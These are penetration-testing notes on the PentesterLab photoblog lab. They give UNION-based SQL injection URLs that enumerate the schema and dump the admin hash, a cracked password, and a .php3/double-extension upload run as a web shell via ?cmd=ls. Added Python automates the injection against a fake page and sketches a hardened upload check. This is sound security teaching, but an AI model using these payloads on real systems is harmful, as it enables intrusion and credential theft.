from mysql to shell 渗透测试笔记.doc (penetration-testing notes, 20 pages)

Summary

Target: the photoblog application on the lab host, written as "28" throughout the notes (the rest of the address was not recorded).

Confirming the injection point:

28/cat.php?id=1%27
  -> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1
telnet 28 80   (manual HTTP check of the web server)

Finding the column count with ORDER BY:

28/cat.php?id=2%20order%20by%203#   -> page renders normally
28/cat.php?id=2%20order%20by%204#   -> page renders normally
28/cat.php?id=2%20order%20by%205#   -> Unknown column '5' in 'order clause'
So the vulnerable SELECT returns 4 columns.

Confirming it with UNION SELECT:

28/cat.php?id=2%20union%20select%201,2,3,4     -> all pictures are displayed
28/cat.php?id=2%20union%20select%201,2,3,4,5   -> The used SELECT statements have a different number of columns

Finding which column is rendered in the page:

28/cat.php?id=2%20union%20select%20user(),database(),version(),4
  -> all pictures are displayed, but none of the user() etc. values appear
28/cat.php?id=1%20union%20select%20user(),database(),version(),current_user()
  -> same: the page never renders column 1, so the value has to be moved
28/cat.php?id=1%20union%20select%201,user(),3,4          -> pentesterlab@localhost
28/cat.php?id=1%20union%20select%201,database(),3,4      -> photoblog
28/cat.php?id=1%20union%20select%201,version(),3,4       -> 5.1.63-0+squeeze1
28/cat.php?id=1%20union%20select%201,current_user(),3,4  -> pentesterlab@localhost
Only the second column is rendered (it is shown as a picture title), so everything to be extracted has to go in that slot.

Enumerating the schema through information_schema:

28/cat.php?id=1%20union%20select%201,tablename,3,4%20from%20information_schema.tables
  -> Unknown column 'tablename' in 'field list'   (the column is table_name)
28/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables
  -> one "picture" per table: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, ENGINES, EVENTS, FILES, GLOBAL_STATUS, GLOBAL_VARIABLES, KEY_COLUMN_USAGE, PARTITIONS, PLUGINS, PROCESSLIST, PROFILING, REFERENTIAL_CONSTRAINTS, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, SESSION_STATUS, SESSION_VARIABLES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS (all belonging to information_schema), followed by the application's own tables: categories, pictures, users
28/cat.php?id=1%20union%20select%201,column_name,3,4%20from%20information_schema.columns
  -> every column name visible to the database user: hundreds of rows from information_schema's own tables (CHARACTER_SET_NAME, DEFAULT_COLLATE_NAME, DESCRIPTION, MAXLEN, ... VIEW_DEFINITION, CHECK_OPTION, IS_UPDATABLE), ending with the application's columns title, img, cat, login, password. Without the table name beside each column this list is hard to use.
28/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.columns
  -> a pile of table names, one per column
28/cat.php?id=1%20union%20select%201,table_name,column_name,4%20from%20information_schema.columns
  -> still a pile of table names: column 3 is not rendered, so column_name is lost
Join the two in the rendered column with concat(table_name,':',column_name):
28/cat.php?id=1%20union%20select%201,concat(table_name,%27:%27,column_name),3,4%20from%20information_schema.columns
  -> table:column pairs; the interesting ones are users:id, users:login, users:password

Dumping the credentials:

28/cat.php?id=1%20union%20select%201,concat(login,%27:%27,password),3,4%20from%20users
  -> admin:8efe310f9ab3efeae8d410a8e0166eb2
28/cat.php?id=1%20union%20select%201,concat(id,%27:%27,login,%27:%27,password),3,4%20from%20users
  -> 1:admin:8efe310f9ab3efeae8d410a8e0166eb2
The 32 hex characters are an unsalted MD5, so a lookup table resolves it directly. Queried at http://www.hashkiller.co.uk/md5-decrypter.aspx: 8efe310f9ab3efeae8d410a8e0166eb2 is MD5 of P4ssw0rd.

From the admin panel to a shell:

Log in to the back end as admin and upload test1.php3; the application echoes the query it runs:
  INSERT INTO pictures (title, img, cat) VALUES (,test1.php3,1
Upload test2.php.aaa:
  INSERT INTO pictures (title, img, cat) VALUES (test,test2.php.aaa,1)
Both names get past the upload filter: .php3 is an alternative PHP extension, and test2.php.aaa is the double-extension variant. Inspecting the page source ("inspect element") shows the pictures are served from admin/uploads, so the uploaded file can be requested directly, passing the command through its cmd parameter:
28/admin/uploads/test1.php3?cmd=ls
  -> cthulhu.png hacker.png ruby.jpg test1.php3 test2.php.aaa
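The ORDER BY / UNION procedure above (count the columns, find the rendered one, then place an expression in that slot) is mechanical, so here it is automated. This is an added example, not code from the notes or from the lab application: the real cat.php is replaced by fake_cat_php, a constructed stand-in that reproduces the three behaviours the notes observed (ORDER BY past the column count errors, a UNION of the wrong width errors, only column 2 is rendered). The rows it "returns", the h3 rendering and the MARKnn marker strings are all assumptions of this example; against a real target the fetch function would do an HTTP GET with the payload URL-encoded and the row regex would be adjusted to the page.

```python
import re

# ---- Constructed stand-in for the lab's cat.php (not the real application) ----
# It reproduces the three behaviours the notes rely on: ORDER BY past the real
# column count errors, a UNION of the wrong width errors, and only one of the
# four selected columns is rendered.  Replace fake_cat_php() with an HTTP GET
# (URL-encoding the payload) to run the same logic against a lab target.
FAKE_COLUMN_COUNT = 4
FAKE_REFLECTED = 2            # 1-based index of the column the page renders
FAKE_ROWS = {                 # (expression, from-table) -> rows the fake returns
    ("user()", ""): ["pentesterlab@localhost"],
    ("database()", ""): ["photoblog"],
    ("version()", ""): ["5.1.63-0+squeeze1"],
    ("table_name", "information_schema.tables"): ["CHARACTER_SETS", "COLLATIONS", "categories", "pictures", "users"],
    ("concat(login,':',password)", "users"): ["admin:8efe310f9ab3efeae8d410a8e0166eb2"],
}


def split_select_list(expr):
    """Split 'a,concat(b,c),d' on top-level commas only (commas inside () stay)."""
    parts, depth, cur = [], 0, []
    for ch in expr:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return parts


def fake_cat_php(id_param):
    """HTML the stand-in returns for cat.php?id=<id_param> (payload not URL-encoded)."""
    m = re.fullmatch(r"\d+ order by (\d+)\s*#?", id_param, re.I)
    if m:
        n = int(m.group(1))
        if n > FAKE_COLUMN_COUNT:
            return "Unknown column '%d' in 'order clause'" % n
        return "<html><h3>ruby</h3></html>"
    m = re.fullmatch(r"\d+ union select (.+?)(?: from (\S+))?", id_param, re.I)
    if m:
        cols = split_select_list(m.group(1))
        table = (m.group(2) or "").lower()
        if len(cols) != FAKE_COLUMN_COUNT:
            return "The used SELECT statements have a different number of columns"
        shown = cols[FAKE_REFLECTED - 1]
        if shown.startswith("'") and shown.endswith("'") or shown.isdigit():
            rows = [shown.strip("'")]          # literals are echoed back as-is
        else:
            rows = FAKE_ROWS.get((shown.lower(), table), [])
        # a real page would also list the legitimate rows for id=1 first
        return "<html>" + "".join("<h3>%s</h3>" % r for r in rows) + "</html>"
    return "<html><h3>ruby</h3></html>"


# ---- The enumeration the notes did by hand, automated ----
ORDER_BY_ERROR = re.compile(r"Unknown column .* in 'order clause'", re.I)
UNION_WIDTH_ERROR = "different number of columns"
ROW = re.compile(r"<h3>(.*?)</h3>")   # how the stand-in renders a row; adjust for a real target


def find_column_count(fetch, max_cols=32):
    """ORDER BY n for n = 1, 2, ...; the first n that errors is one past the count."""
    for n in range(1, max_cols + 1):
        if ORDER_BY_ERROR.search(fetch("1 order by %d#" % n)):
            return n - 1
    raise RuntimeError("no ORDER BY error up to %d columns" % max_cols)


def find_reflected_columns(fetch, ncols):
    """UNION SELECT a distinct marker string per column; the ones that render are usable."""
    markers = ["'MARK%02d'" % i for i in range(1, ncols + 1)]
    page = fetch("1 union select " + ",".join(markers))
    if UNION_WIDTH_ERROR in page:
        raise RuntimeError("column count %d is wrong" % ncols)
    return [i for i in range(1, ncols + 1) if "MARK%02d" % i in page]


def extract(fetch, ncols, column, expression, from_table=""):
    """Put `expression` in slot `column`, pad the others with numbers, return rendered rows."""
    select_list = [str(i) for i in range(1, ncols + 1)]
    select_list[column - 1] = expression
    payload = "1 union select " + ",".join(select_list)
    if from_table:
        payload += " from " + from_table
    return ROW.findall(fetch(payload))


if __name__ == "__main__":
    n = find_column_count(fake_cat_php)
    shown = find_reflected_columns(fake_cat_php, n)
    print("columns:", n, "rendered:", shown)
    # The notes' first attempt put user() in column 1, which the page never renders:
    print(extract(fake_cat_php, n, 1, "user()"))
    # Moving it into the rendered column is what made it appear:
    print(extract(fake_cat_php, n, shown[0], "user()"))
    print(extract(fake_cat_php, n, shown[0], "concat(login,':',password)", "users"))
```

The marker step is what the notes skipped on the first two UNION attempts: with user() in column 1 the page renders the padding value of column 2 and nothing else, which looks like "no output" rather than a wrong slot. Probing every slot with a distinct literal once shows exactly which positions are usable before any real expression is tried.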
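The upload step works because the filter and the web server disagree about what counts as PHP. The following is an added example, not the photoblog's code (the notes never show the filter): weak_filter_accepts is an assumed reconstruction that rejects only a literal .php suffix, which is consistent with test1.php3 and test2.php.aaa both being accepted; apache_runs_as_php models the usual Apache mod_php behaviour, where any PHP-mapped extension in a multi-extension name is enough; hardened_accepts is the corrected check an upload handler should apply. The image magic bytes and the sample contents are constructed inputs.

```python
import os
import secrets

# Extensions a typical Apache + mod_php setup hands to the PHP interpreter.
# mod_mime checks every dotted suffix of a multi-extension name, so one
# PHP-mapped extension anywhere in "x.php.aaa" is enough.
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Allowed image types with the leading bytes their files must start with.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def weak_filter_accepts(filename):
    """Assumed lab filter (the notes do not show it): rejects only a literal .php suffix."""
    return not filename.lower().endswith(".php")


def apache_runs_as_php(filename):
    """Would Apache/mod_php execute this name?  Any PHP-mapped extension counts."""
    suffixes = filename.lower().split(".")[1:]
    return any(s in PHP_EXTENSIONS for s in suffixes)


def hardened_accepts(filename, head):
    """Allowlist one extension, verify the content matches it, and pick the stored
    name ourselves.  Returns the name to store under, or None to reject."""
    if "\x00" in filename or os.path.basename(filename) != filename:
        return None                                   # NUL byte or path components
    stem, dot, ext = filename.rpartition(".")
    if not dot or not stem or "." in stem:
        return None                                   # exactly one extension
    ext = ext.lower()
    magic = IMAGE_MAGIC.get(ext)
    if magic is None or not head.startswith(magic):
        return None                                   # not an allowed image type
    return "%s.%s" % (secrets.token_hex(16), ext)      # uploader never chooses the name


if __name__ == "__main__":
    for name in ("test1.php3", "test2.php.aaa", "shell.php", "cat.png"):
        print("%-14s weak filter: %-5s  runs as PHP: %s" % (
            name, weak_filter_accepts(name), apache_runs_as_php(name)))
    print(hardened_accepts("test1.php3", b"<?php echo 1; ?>"))
    print(hardened_accepts("test2.php.aaa", b"<?php echo 1; ?>"))
    print(hardened_accepts("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8))
```

The magic-byte check only rejects obvious non-images; a valid PNG with PHP appended still passes it. What actually prevents the notes' outcome is the single allowlisted extension plus the server-generated file name, and the upload directory should additionally be served with script execution disabled so that even a misnamed file is returned as bytes rather than run.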
